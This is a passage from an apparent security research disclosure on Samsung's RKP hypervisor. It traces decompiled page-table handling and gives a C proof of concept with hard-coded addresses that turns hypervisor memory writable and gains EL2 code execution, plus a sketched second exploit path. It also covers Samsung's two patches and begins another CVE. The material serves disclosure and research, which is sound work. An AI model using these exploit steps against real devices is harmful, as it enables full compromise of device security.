      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      set_pxn_bit_of_desc(desc_p, 1);
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l1pgt_process_table changes the type of the page in the physmap to L1, sets the page as read-only in stage 2, then calls rkp_l2pgt_process_table on our "fake PMD" (our target page) located in hypervisor memory:

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  if (is_alloc) {
    if (is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // ...
    res = rkp_phys_map_set(pmd, L2);
    // ...
    res = rkp_s2_page_change_permission(pmd, 0x80, 0, 0);
    // ...
  }
  // ...
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pmd);
  return res;
}

rkp_l2pgt_process_table changes the type of the page in the physmap to L2, sets the page as read-only in the stage 2 page tables, then calls check_single_l2e on each entry of the "fake PMD" (that we don't have control of):

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
  // ...
  set_pxn_bit_of_desc(desc_p, 2);
  // ...
  desc = *desc_p;
  type = desc & 3;
  if (type == 1) {
    return 0;
  }
  if (type != 3) {
    if (desc) {
      uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
    }
    return 0;
  }
  // ...
  return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}

check_single_l2e will set the PXN bit of the descriptor (which in our case is each 8-byte value in our target page) and will process values that look like a table descriptor. That's something we will need to keep in mind when choosing our target page in hypervisor memory.

Up to this point, we have gotten our target page set as L2 in the physmap, and read-only in the stage 2 page tables.

The second step is to call rkp_cmd_free_pgd, which calls rkp_l1pgt_free_pgd.

rkp_l1pgt_free_pgd calls rkp_l1pgt_process_table, that once again will process our "fake PGD" (high_bits is 0 but this time is_alloc is 0):

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  if (!is_alloc) {
    if (!is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    res = rkp_phys_map_set(pgd, FREE);
    // ...
    res = rkp_s2_page_change_permission(pgd, 0, 1, 0);
    // ...
  }
  offset = 0;
  entry = 0;
  start_addr = high_bits << 39;
  // ...
  // for each descriptor:
  do {
    if ((desc & 3) != 3) {
      if (desc) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    } else {
      addr = start_addr & 0xffffff803fffffff | offset;
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      if (!(start_addr >> 39)) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l1pgt_process_table changes the type of the page in the physmap to FREE, sets the page as read-write, then calls rkp_l2pgt_process_table on our "fake PMD":

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  if (!is_alloc) {
    if (!is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    if (table_addr >= 0xffffff8000000000) {
      rkp_policy_violation("Never allow free kernel page table %lx", pmd);
    }
    if (is_phys_map_kernel(pmd)) {
      rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
    }
    res = rkp_phys_map_set(pmd, FREE);
    // ...
    res = rkp_s2_page_change_permission(pmd, 0, 1, 0);
    // ...
  }
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pmd);
  return res;
}

rkp_l2pgt_process_table changes the type of the page in the physmap to FREE and sets the page as read-write in the page tables. It calls check_single_l2e again, that will do the same thing as before.

Choosing A Target Page

Because check_single_l2e sets the PXN bit of the descriptors (the content of our target page) and further processes values that look like a table descriptor, we cannot directly target RKP's code. Interesting targets that are writable from EL2 include RKP's page tables (the stage 2 page tables for EL1 or the page tables for EL2). But by definition, they contain valid descriptors, so they are very likely to make RKP or the kernel crash at some point as a result of this processing.

The target page that we chose is the one containing the memory backing the protected_ranges memlist. It contains values that are aligned on 8 bytes, so they look like invalid descriptors. And by nullifying this list, we are then able to provide addresses located inside the hypervisor memory region to all the command handlers.

This memlist is allocated in the pa_restrict_init function:

int64_t pa_restrict_init() {
  memlist_init(&protected_ranges);
  memlist_add(&protected_ranges, 0x87000000, 0x200000);
  // ...
}

To know where the memory backing this memlist will be allocated, we need to dig into memlist_init:

int64_t memlist_init(memlist_t* list) {
  // ...

  memset(list, 0, sizeof(memlist_t));
  res = memlist_reserve(list, 5);
  list->capacity = 5;
  list->merged = 0;
  list->unkn_14 = 0;
  cs_init(&list->cs);
  return res;
}

The default capacity of memlists seems to be 5 entries. Since the protected_ranges memlist never contains more than 5 memory regions (even with the memory backing the physmap being added to it), it never gets reallocated so there's only ever one allocation. Let's see what memlist_reserve does:

int64_t memlist_reserve(memlist_t* list, uint64_t size) {
  // ...

  if (!list || !size) {
    return -1;
  }
  base = heap_alloc(0x20 * size, 0);
  if (!base) {
    return -1;
  }
  memset(base, 0, 0x20 * size);
  if (list->base) {
    for (index = 0; index < list->count; ++index) {
      new_entry = &base[index];
      old_entry = &list->base[index];
      new_entry->addr = old_entry->addr;
      new_entry->size = old_entry->size;
      new_entry->unkn_10 = old_entry->unkn_10;
      new_entry->extra = old_entry->extra;
    }
    heap_free(list->base);
  }
  list->base = base;
  return 0;
}

The memory allocated (5 x 32 bytes) for backing the memlist comes from the "static heap" allocator. When this allocation is made, the "static heap" region is made of:

  • the EL2 memory: 0x87000000-0x87200000;
  • minus the log region: 0x87100000-0x87140000;
  • minus the uH/RKP region: 0x87000000-0x87046000;
  • minus the "bigdata" region: 0x870FF000-87100000.

So the address returned by the allocator should be somewhere after 0x87046000 (between the uH/RKP and "bigdata" regions). To know at which offset exactly it will be, we need to look at the allocations done before pa_restrict_init.

By carefully tracing the execution, we find 4 allocations, all in the functions below:

int64_t uh_init(int64_t uh_base, int64_t uh_size) {
  // ...
  apps_init();
  uh_init_bigdata();
  uh_init_context();
  memlist_init(&uh_state.dynamic_regions);
  pa_restrict_init();
  // ...
}
uint64_t apps_init() {
  // ...
  res = uh_handle_command(i, 0, &saved_regs);
  // ...
}
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
  // ...
  return cmd_handler(regs);
}
int64_t rkp_cmd_init() {
  // ...
  rkp_init_cmd_counts();
  // ...
}
uint8_t* rkp_init_cmd_counts() {
  // ...
  malloc(0x8a, 0);
  // ...
}
int64_t uh_init_bigdata() {
  if (!bigdata_state) {
    bigdata_state = malloc(0x230, 0);
  }
  memset(0x870ffc40, 0, 0x3c0);
  memset(bigdata_state, 0, 0x230);
  return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
int64_t* uh_init_context() {
  // ...

  uh_context = malloc(0x1000, 0);
  if (!uh_context) {
    uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
  }
  return memset(uh_context, 0, 0x1000);
}

  • The first allocation of size 0x8A happens in rkp_init_cmd_counts.
  • The second allocation of size 0x230 happens in uh_init_bigdata.
  • The third allocation of size 0x1000 happens in uh_init_context.
  • The fourth allocation of size 0xA0 comes from memlist_init(&dynamic_regions).

Now we can calculate the offset. Each allocation has a header of 0x18 bytes, and the allocator rounds up the total size to the next 8-byte boundary. By doing the maths properly, we find the physical address where protected_ranges is allocated:

>>> f = lambda x: (x + 0x18 + 7) & 0xFFFFFFF8
>>> 0x87046000 + f(0x8A) + f(0x230) + f(0x1000) + f(0xA0) + 0x18
0x870473d8

We also need to know what's in the same page as the protected_ranges memlist. It is preceded by the uh_context which is memset and only used on panics. And it is followed by a memlist reallocation coming from init_cmd_add_dynamic_region, and a page-aligned allocation of a stage 2 page table coming from init_cmd_initialize_dynamic_heap. This means that there should be no value looking like a page table descriptor in this page (at least there wasn't on our test device).

Now that we have made the page containing the protected_ranges memlist writable in the stage 2, we can directly modify it from the kernel. The goal is to have check_kernel_input always return 0 so that we can give arbitrary addresses inside hypervisor memory to all the command handlers. check_kernel_input calls protected_ranges_contains, which itself calls memlist_contains_addr:

int64_t memlist_contains_addr(memlist_t* list, uint64_t addr) {
  // ...

  cs_enter(&list->cs);
  for (index = 0; index < list->count; ++index) {
    entry = &list->base[index];
    if (addr >= entry->addr && addr < entry->addr + entry->size) {
      cs_exit(&list->cs);
      return 1;
    }
  }
  cs_exit(&list->cs);
  return 0;
}

Since the first entry is the one spanning over the hypervisor memory, by setting its size field (at offset 8) to zero, we effectively disable the blacklist.

Getting Code Execution

The final step to fully compromise the hypervisor is to get arbitrary code execution. This can be achieved in multiple ways, but the simplest way is likely to manually modify the page tables of the stage 2 at EL1.

For example, we can target the level 2 descriptor that covers the memory range of the hypervisor and turn it into a writable block descriptor. The write itself can be performed by calling rkp_cmd_write_pgt3 since we have disabled the protected_ranges memlist. We can dump the initial stage 2 page tables at EL1 using an IDAPython script to find the physical address of the target descriptor:

import ida_bytes

sizes = [0x8000000000, 0x40000000, 0x200000, 0x1000]

def parse_static_s2_page_tables(table, level=1, start_vaddr=0):
    size = sizes[level]

    for i in range(512):
        desc_addr = table + i * 8
        desc = ida_bytes.get_qword(desc_addr)
        if (desc & 3) == 0 or (desc & 3) == 1:
            continue
        paddr = desc & 0xFFFFFFFFF000
        vaddr = start_vaddr + i * size

        if level < 3 and (desc & 3) == 3:
            print("L%d Table for %016x-%016x is at %08x" \
                  % (level + 1, vaddr, vaddr + size, paddr))
            parse_static_s2_page_tables(paddr, level + 1, vaddr)

parse_static_s2_page_tables(0x87028000)

L2 Table for 0000000000000000-0000000040000000 is at 87032000
L3 Table for 0000000002000000-0000000002200000 is at 87033000
L2 Table for 0000000080000000-00000000c0000000 is at 8702a000
L2 Table for 00000000c0000000-0000000100000000 is at 8702b000
L2 Table for 0000000880000000-00000008c0000000 is at 8702c000
L2 Table for 00000008c0000000-0000000900000000 is at 8702d000
L2 Table for 0000000900000000-0000000940000000 is at 8702e000
L2 Table for 0000000940000000-0000000980000000 is at 8702f000
L2 Table for 0000000980000000-00000009c0000000 is at 87030000
L2 Table for 00000009c0000000-0000000a00000000 is at 87031000

The L2 table mapping 0x80000000-0xc0000000 is at 0x8702a000. We get the descriptor's address, which depends on the target address (0x87000000) and the L2 block size (0x200000), by adding an offset to the L2 table address:

>>> 0x8702a000 + ((0x87000000 - 0x80000000) // 0x200000) * 8
0x8702a1c0

The descriptor's value is made of the target address and its attributes: 0x87000000 | 0x4fd = 0x870004fd.

0 1 00 11 1111 01 = 0x4fd
^ ^ ^  ^  ^    ^
| | |  |  |    `-- Type: block descriptor
| | |  |  `------- MemAttr[3:0]: NM, OWBC, IWBC
| | |  `---------- S2AP[1:0]: read/write
| | `------------- SH[1:0]: NS
| `--------------- AF: 1
`----------------- FnXS: 0

As mentioned above, we will do the write by calling rkp_cmd_write_pgt3. rkp_cmd_write_pgt3 calls rkp_l3pgt_write:

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    if ((pte_val & 3) != 3 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    } else {
      allowed = rkp_deferred_inited == 0;
    }
  } else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  // ...
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  return set_entry_of_pgt(ptep_pa, pte_val);
}
uint64_t* set_entry_of_pgt(uint64_t* ptr, uint64_t val) {
  *ptr = val;
  return ptr;
}

ptep_pa (the descriptor's physical address) is marked as FREE in the physmap, and pte_val (the descriptor's value) & 3 == 1, so we can call set_entry_of_pgt with our values.

Proof of Concept

For this simple proof of concept code, we're assuming that the attacker has an arbitrary read/write of kernel memory, as well as the ability to make hypervisor calls.

#define UH_APP_RKP 0xc300c002

#define RKP_CMD_NEW_PGD    0x0a
#define RKP_CMD_FREE_PGD   0x09
#define RKP_CMD_WRITE_PGT3 0x05

#define PROTECTED_RANGES_BITMAP 0x870473D8
#define BLOCK_DESC_ADDR         0x8702a1c0
#define BLOCK_DESC_DATA         0x870004fd

uint64_t pa_to_va(uint64_t pa) {
    return pa - 0x80000000UL + 0xffffffc000000000UL;
}

void exploit() {
    /* allocate and clear our "fake PGD" */
    uint64_t pgd = kernel_alloc(0x1000);
    for (uint64_t i = 0; i < 0x1000; i += 8)
        kernel_write(pgd + i, 0UL);

    /* write our "fake PMD" descriptor */
    kernel_write(pgd, (PROTECTED_RANGES_BITMAP & 0xFFFFFFFFF000UL) | 3UL);

    /* make the hyp call that will set the page RO */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_NEW_PGD, pgd);
    /* make the hyp call that will set the page RW */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_FREE_PGD, pgd);

    /* zero out the "protected ranges" first entry */
    kernel_write(pa_to_va(PROTECTED_RANGES_BITMAP + 8), 0UL);

    /* write the descriptor to make hyp memory writable */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3,
                    pa_to_va(BLOCK_DESC_ADDR), BLOCK_DESC_DATA);
}

The exploit was successfully tested on the most recent firmware available for our test device (at the time of the report): A515FXXU4CTJ1. The two-fold bug appeared to be present in the binaries of both Exynos and Snapdragon devices, including the S10/S10+/S20/S20+ flagship devices, but its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make a hypervisor call with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

In particular, on Snapdragon devices, the s2_map function (called from rkp_s2_page_change_permission and rkp_s2_range_change_permission) makes an indirect call to a QHEE function (since it is QHEE that is in charge of the page tables). We did not follow this call to see if it made any additional checks. On the Galaxy S20, there is also an indirect call to the new hypervisor framework (called H-Arx), but we did not follow it either.

The memory layout will also be different on other devices than the one we have targeted in the exploit, so the hard-coded addresses won't work. But we believe that they can be adapted, or that an alternative exploitation strategy can be found for those devices.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Mark the pages unmapped by s2_unmap as S2UNMAP in the physmap
- Perform the additional checks of rkp_s2_page_change_permission in rkp_s2_range_change_permission as well
- Add calls to check_kernel_input in the rkp_lxpgt_process_table functions

First Patch

To see how Samsung patched this vulnerability, we binary diffed the most recent firmware available for the Samsung Galaxy S10 (at the time of checking the first patch): G973FXXSBFUF3. We could not use the latest firmware for the Samsung Galaxy A51 as this device had not been updated to the June patch level yet.

There have been some changes to rkp_s2_page_change_permission (and none to rkp_s2_range_change_permission):

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
+                                      uint32_t type,
                                      uint32_t exec,
                                      uint32_t allow) {
  // ...

  if (!allow && !rkp_inited) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (is_phys_map_s2unmap(p_addr)) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (page_allocator_is_allocated(p_addr) == 1
        || (p_addr >= TEXT_PA && p_addr < ETEXT_PA)
        || (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)))
-    return 0;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  // ...
+  if (access == 0x80) {
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  }
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  tlbivaae1is(((p_addr + 0x80000000) | 0xFFFFFFC000000000) >> 12);
-  return rkp_set_pgt_bitmap(p_addr, access);
+  if (access != 0x80)
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  return 0;

  • the new physmap type is given as argument to the function;
  • on failure of the checks (which are themselves unchanged), the new physmap type is set anyway;
  • if the access is read-only, the physmap type is set and the ro_bitmap updated, and only then is the page mapped in the stage 2;
  • if the access is read-write, the page is first mapped in the stage 2, and only then are the physmap type set and the ro_bitmap updated.

So far, nothing in these changes prevents using these two functions to remap previously unmapped memory.

There have also been some changes to the rkp_lxpgt_process_table functions:

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pgd);
    // ...
  } else {
    // ...
  }
  // ...
}
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pmd);
    // ...
  } else {
    // ...
  }
}
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pte);
    // ...
  } else {
    // ...
  }
  // ...
}

For the allocation path, the rkp_lxpgt_process_table functions now call check_kernel_input before changing the permissions of the page and processing it. This makes it so that we can't reuse the same exploit path to call rkp_s2_page_change_permission, but does nothing about the other ways to call it.

During binary diffing, we did not find a change that fixes the actual issue: pages unmapped in the stage 2 were still not marked as S2UNMAP in the physmap. So we started looking for a new exploitation strategy to demonstrate to Samsung that their fix was not sufficient. While we did not implement and test it on a real device due to a lack of time, we devised the theoretical approach explained below.

Finding A New Exploit Path

As explained in the Exploring Our Options section, the set_range_to_rox_l3 and set_range_to_pxn_l3 functions can also be used to reach a call to rkp_s2_page_change_permission, but with some major caveats.

For set_range_to_pxn_l3 (called from rkp_set_range_to_pxn):

  • our target page must be marked KERNEL|L3 in the physmap;
  • we must write a user-controlled descriptor into the kernel page tables;
  • the "dynamic load" feature is only available on Exynos devices.

For set_range_to_rox_l3 (called from rkp_set_range_to_rox):

  • our target page will be set as read-only in the stage 2;
  • we must write a user-controlled descriptor into the kernel page tables;
  • the "dynamic load" feature is only available on Exynos devices.

Nevertheless, these two functions are our only remaining options, so let's see how we can work around their quirks.

Writing The Kernel Page Tables

For our new exploitation strategy, we need a region of kernel virtual memory of the size of a level 2 block that is currently unmapped in the kernel page tables. Let's call this region's virtual address kernel_va. This range has an invalid/empty descriptor in the kernel level 2 page tables. Let's call that descriptor's physical address l2_desc_pa.

We will change this invalid descriptor into a table descriptor, whose output address (the address of the level 3 page table) is our target page location in hypervisor memory that we want to remap and make writable from the kernel. Let's call this physical address target_pa.

To make this change, we can use the rkp_cmd_write_pgt2 command. It calls rkp_l2pgt_write with the following arguments:

  • the virtual address of the level 2 descriptor (which translates to l2_desc_pa);
  • the new descriptor value: target_pa | 3.

Since we are writing to a legitimate level 2 table, l2_desc_pa is marked as KERNEL|L2 in the physmap. The old descriptor value is 0, and the new one isn't, so we end up with a call to check_single_l2e with the following arguments:

  • a pointer to the new descriptor value on the stack;
  • the virtual address that the descriptor maps: kernel_va;
  • is_alloc == 1.

If we choose kernel_va so that it is not contained in the executable_regions memlist, the PXN bit of the new descriptor value is set. Then, because the new descriptor value is a table descriptor, we end up with a call to rkp_l3pgt_process_table with the following arguments:

  • the descriptor output address: target_pa;
  • the virtual address that the descriptor maps: kernel_va;
  • is_alloc == 1;
  • protect == 0.

Because protect == 0, rkp_l3pgt_process_table will simply return early. Finally, rkp_l2pgt_write will write the new value of the descriptor, before returning.
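
Reusing the helpers from the earlier proof of concept, this step could look like the sketch below. The RKP_CMD_WRITE_PGT2 value and the l2_desc_va/target_pa placeholders are assumptions that have to be adapted to the target firmware and memory layout.

#define UH_APP_RKP         0xc300c002
#define RKP_CMD_WRITE_PGT2 0x04  /* assumed command identifier, check the command table of the target firmware */

/* l2_desc_va: kernel VA of the empty level 2 descriptor covering kernel_va
   target_pa:  hypervisor page we want to remap later (e.g. the page backing protected_ranges) */
void write_fake_l2_descriptor(uint64_t l2_desc_va, uint64_t target_pa) {
    /* turns the empty descriptor into a table descriptor pointing into EL2 memory */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT2, l2_desc_va, target_pa | 3UL);
}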

Remapping Memory As Writable

Our setup is ready: we have a PMD marked as KERNEL|L2 in the physmap containing a descriptor pointing to a PTE located in hypervisor memory. We can now remap the memory as writable by abusing the "dynamic executable" commands (available only on Exynos). We will first remap the memory as read-only using the dynamic_load_ins function, then change it to read-write using the dynamic_load_rm function.

The code path that needs to be taken is as follows:

rkp_cmd_dynamic_load
    |> dynamic_load_ins
        |> dynamic_load_check
            code range must be in the binary range
            must not overlap another "dynamic executable"
            must not be in the ro_bitmap
        |> dynamic_load_protection
            will make the code range RO (and add it to the ro_bitmap)
        |> dynamic_load_verify_signing
            if type != 3, no signature checking
        |> dynamic_load_make_rox
            calls rkp_set_range_to_rox!
        |> dynamic_load_add_executable
            code range added to the executable_regions
        |> dynamic_load_add_dynlist
            code range added to the dynamic_load_regions
rkp_cmd_dynamic_load
    |> dynamic_load_rm
        |> dynamic_load_rm_dynlist
            code range is removed from dynamic_load_regions
        |> dynamic_load_rm_executable
            code range is removed from executable_regions
        |> dynamic_load_set_pxn
            calls rkp_set_range_to_pxn!
        |> dynamic_load_rw
            will make the code range RW (and remove it from the ro_bitmap)

We need to pass the virtual address range starting at kernel_va to the dynamic_load_xxx functions. Because this range is currently unused, it will be marked as FREE in the physmap at the time of the call. Thus, all the checks should pass, and the functions rkp_set_range_to_rox and rkp_set_range_to_pxn will be called. They will remap in the stage 2 our "fake PTE", target_pa, as read-only first (in rkp_set_range_to_rox), then as read-write (in rkp_set_range_to_pxn).

As was already happening in the original exploit, if the target page contains quad-word values that look like valid level 3 page table descriptors, then their PXN bit might be set. In that case, the target page needs to be writable by the hypervisor. We still target the page containing the memory backing the protected_ranges memlist.

Second Patch

To see how Samsung patched this vulnerability this time around, we binary diffed the most recent firmware available for the Samsung Galaxy S10: G973FXXSEFUJ2.

There have been some changes to rkp_s2_page_change_permission:

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
-                                      uint32_t exec,
-                                      uint32_t allow) {
+                                      uint32_t exec) {
  // ...

-  if (!allow && !rkp_inited) {
+  if (!rkp_deferred_inited) {
    // ...
  }
+  check_kernel_input(p_addr);
  // ...
}

The function now calls check_kernel_input, which will ensure that the physical address is not in the protected_ranges memlist.

There have been some changes to rkp_s2_range_change_permission as well:

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...
-  if (!allow && !rkp_inited) {
-    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
-    rkp_policy_violation("Range change permission prohibited");
-  } else if (allow != 2 && rkp_deferred_inited) {
-    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
-    rkp_policy_violation("Range change permission prohibited");
-  }
+  if (rkp_deferred_inited) {
+    if (allow != 2) {
+      uh_log('L', "rkp_paging.c", 643, "RKP_33605b63");
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    if (start_addr > end_addr) {
+      uh_log('L', "rkp_paging.c", 650, "RKP_b3952d08%llxRKP_dd15365a%llx",
+             start_addr, end_addr - start_addr);
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    protected_ranges_overlaps(start_addr, end_addr - start_addr);
+    addr = start_addr;
+    do {
+      rkp_phys_map_lock(addr);
+      if (is_phys_map_s2unmap(addr))
+        rkp_policy_violation("RKP_1b62896c %p", addr);
+      rkp_phys_map_unlock(addr);
+      addr += 0x1000;
+    } while (addr < end_addr);
+  }
  // ...
}

+int64_t protected_ranges_overlaps(uint64_t addr, uint64_t size) {
+    if (memlist_overlaps_range(&protected_ranges, addr, size)) {
+        uh_log('L', "pa_restrict.c", 122, "RKP_03f2763e%lx RKP_a54942c8%lx", addr, size);
+        return uh_log('D', "pa_restrict.c", 124, "RKP_03f2763e%lxRKP_c5d4b9a4%lx", addr, size);
+    }
+    return 0;
+}

The function now calls protected_ranges_overlaps, which will ensure that the physical address range does not overlap with the protected_ranges memlist, and panic if it does. Furthermore, a check has also been added to ensure that none of the pages of the physical address range are marked as S2UNMAP in the physmap.

Writing executable kernel pages

SVE-2021-20179 (CVE-2021-25416): Possible creating executable kernel page via abusing dynamic load functions

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 5, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area.
The patch adds the proper address validation in RKP to prevent creating executable kernel page.

Vulnerability

We found this vulnerability while investigating the "dynamic executable" feature of RKP. It allows the kernel to load Samsung-signed executable binaries into memory. It is only used for the Fully Interactive Mobile Camera (FIMC) subsystem, and since this subsystem only exists on Exynos devices, this feature is not implemented on Snapdragon devices.

In the kernel sources, we can find some examples of loading/unloading a "dynamic executable" in the functions fimc_is_load_ddk_bin and fimc_is_load_rta_bin:

// from include/linux/rkp.h
typedef struct dynamic_load_struct{
    u32 type;
    u64 binary_base;
    u64 binary_size;
    u64 code_base1;
    u64 code_size1;
    u64 code_base2;
    u64 code_size2;
} rkp_dynamic_load_t;

// from drivers/media/platform/exynos/fimc-is2/interface/fimc-is-interface-library.c
int fimc_is_load_ddk_bin(int loadType)
{
    // ...
#ifdef CONFIG_UH_RKP
    rkp_dynamic_load_t rkp_dyn;
    static rkp_dynamic_load_t rkp_dyn_before = {0};
#endif
    // ...
    if (loadType == BINARY_LOAD_ALL) {
#ifdef CONFIG_UH_RKP
        memset(&rkp_dyn, 0, sizeof(rkp_dyn));
        rkp_dyn.binary_base = lib_addr;
        rkp_dyn.binary_size = bin.size;
        rkp_dyn.code_base1 = memory_attribute[INDEX_ISP_BIN].vaddr;
        rkp_dyn.code_size1 = memory_attribute[INDEX_ISP_BIN].numpages * PAGE_SIZE;
#ifdef USE_ONE_BINARY
        rkp_dyn.type = RKP_DYN_FIMC_COMBINED;
        rkp_dyn.code_base2 = memory_attribute[INDEX_VRA_BIN].vaddr;
        rkp_dyn.code_size2 = memory_attribute[INDEX_VRA_BIN].numpages * PAGE_SIZE;
#else
        rkp_dyn.type = RKP_DYN_FIMC;
#endif
        if (rkp_dyn_before.type)
            uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_RM,(u64)&rkp_dyn_before, 0, 0);
        memcpy(&rkp_dyn_before, &rkp_dyn, sizeof(rkp_dynamic_load_t));
#endif
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_ISP_BIN]);
        if (ret) {
            err_lib("failed to change into NX memory attribute (%d)", ret);
            return ret;
        }

#ifdef USE_ONE_BINARY
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_VRA_BIN]);
        if (ret) {
            err_lib("failed to change into NX memory attribute (%d)", ret);
            return ret;
        }
#endif
        // ...
        if (bin.size <= bin_size) {
            memcpy((void *)lib_addr, bin.data, bin.size);
            __flush_dcache_area((void *)lib_addr, bin.size);
        }
        // ...
#ifdef CONFIG_UH_RKP
        ret = uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, (u64)&rkp_dyn, 0, 0);
        if (ret) {
            err_lib("fail to load verify FIMC in EL2");
        }
#else
        // ...
#endif
        // ...
}

The kernel first fills a rkp_dynamic_load_t structure with the information about the binary to load. If the binary is already loaded, it unloads it by making a uh_call with the command RKP_DYNAMIC_LOAD and the subcommand RKP_DYN_COMMAND_RM. It then makes the memory RW- and copies the binary's code and data segments into it. Finally, it makes the binary code executable by making a uh_call with the command RKP_DYNAMIC_LOAD and the subcommand RKP_DYN_COMMAND_INS.

// from init/main.c
#ifdef CONFIG_UH_RKP
rkp_init_t rkp_init_data __rkp_ro = {
    // ...
    .no_fimc_verify = 0,
    // ...
};
// ...
static void __init rkp_init(void)
{
    // ...
    uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}
// ...
#endif

The hypervisor will verify the binary's integrity, unless verification was disabled by the kernel during initialization by setting the no_fimc_verify field of the rkp_init_t structure given to the RKP_START command to 1 (which was the case in some of the kernel sources we have seen).

Back in the hypervisor, the handler that processes the RKP_DYNAMIC_LOAD command and its subcommands is rkp_cmd_dynamic_load:

int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...

  type = regs->x2;
  rkp_dyn = (rkp_dynamic_load_t*)rkp_get_pa(regs->x3);
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    if (res) {
      uh_log('W', "rkp_dynamic.c", 392, "dynamic_breakdown_before_init failed");
    }
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    if (!res) {
      uh_log('L', "rkp_dynamic.c", 406, "dynamic_load ins type:%d success", rkp_dyn->type);
    }
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    if (!res) {
